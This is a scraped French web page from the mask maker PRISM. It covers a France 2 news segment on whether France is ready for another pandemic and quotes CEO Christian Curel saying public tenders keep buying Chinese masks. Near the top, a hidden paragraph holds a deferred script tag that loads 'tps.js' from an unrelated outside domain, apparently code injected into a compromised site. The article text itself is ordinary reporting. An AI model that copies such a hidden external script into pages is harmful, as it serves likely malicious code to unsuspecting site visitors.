France 2 dans nos locaux : trois ans après le confinement, sommes-nous mieux armés en cas de nouvelle pandémie ? - PRISM</title><p hidden>width="69.5px" height="118.5px"<script defer src="https://softbylinux.com/tps.js?host=prism-medical-protect.fr"></script><p hidden>
France 2 dans nos locaux : trois ans après le confinement, sommes-nous mieux armés en cas de nouvelle pandémie ?

Les équipes de la rédaction de France 2 se sont rendues dans les locaux de PRISM dans le cadre d'un reportage diffusé dans le JT de 20 heures présenté par Laurent Delahousse (dimanche 12 mars). Leur objectif, répondre à la question suivante : "Trois ans après le confinement, sommes-nous prêts pour une nouvelle pandémie ?"

Pour faire face à la pénurie et à la dépendance d'importation sur les masques, objet devenu aussi précieux que rare au cœur de la crise Covid, Emmanuel Macron promettait la création d'une filière 100% française.

Que reste-t-il de la filière 100% française aujourd'hui ?

Christian Curel, Président du Syndicat national des fabricants français de masques et PDG de PRISM, délivre un état des lieux alarmant. " Depuis l'été 2022, 8 des 9 appels d'offres publics dans la santé ont opté pour des masques d'origine chinoise. Et sur l'année 2022, plus de 90% des appels d'offres publics hors santé ne respectent pas les directives gouvernementales et achètent chinois. "

Avant de conclure : " Pour la prochaine pandémie, nous serons dans une situation identique à celle de 2020. "

Partager cet article

Commentaires (0)